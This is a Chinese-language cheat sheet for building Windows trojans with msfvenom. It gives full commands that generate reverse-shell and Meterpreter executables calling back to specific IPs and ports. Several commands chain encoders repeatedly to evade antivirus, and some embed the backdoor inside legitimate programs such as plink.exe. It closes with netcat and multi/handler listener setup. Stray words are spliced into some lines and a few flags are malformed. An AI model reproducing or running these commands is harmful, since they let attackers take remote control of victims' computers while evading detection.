msfvenom太有名了,人人皆知也是缺點 linux
是一個框架,能夠改動
-msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.135 lport=7001 -a x86 --platform win -f exe -o a.exeshell
-p 指定payload路徑
lhost=1.1.1.1 lport=4444 //
-a x86 //操做系統的架構
--platform win //平臺,win是windows 平臺
-f exe //輸出格式,這裏是exe格式輸出
-o //輸出的名字windows
加密生成shell架構
msfvenom -p windows/shell/bind_tcp lhost=192.168.33.135 lport=7001 -f raw -e
x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/
countdown -i 7 -f raw | msfvenom -a x86 --platform windows -e x86/
shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe框架
-f raw 以原始的模式輸出
-e 接加密編碼模塊 -i 接數字加密多少次 | ....再次加密
-b ‘\xoo’ 把\xoo特點字符處理掉tcp
generate -b '\x00\xff' -f exe -o /home/1.exe編碼
把後門綁定在其餘模板上:-x
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.33.135 lport=7001 -arch x86 --platform win -f exe -o c.exe加密
直接在linux上運行下面命令生成木馬操作系統
普通反彈tcp(shell_reverse_tcp):orm
msfvenom -p windows/shell_reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/5432.exe
利用:能夠直接用nc鏈接,或者msf不用設payload
利用反彈meterpreter_tcp/http:
msfvenom -p windows/meterpreter/reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54320.exe
使用加密:
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe -o /home/kali/Desktop/meter_http_msfjiami_54322
加密綁定文件(有時候文件沒法正常使用):
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -k-x /home/kali/Desktop/key.exe -f exe -o /home/kali/Desktop/54322_key_http_msfjiami.exe
不加密綁定文件:
msfvenom -p windows/meterpreter/reverse_http -k-x /home/kali/Desktop/bing.exe lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54322_bing.exe
監控:
nc -l -p 7002
或者:
use exploit/multi/handler
//set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.33.143
set LPORT 7001
exploit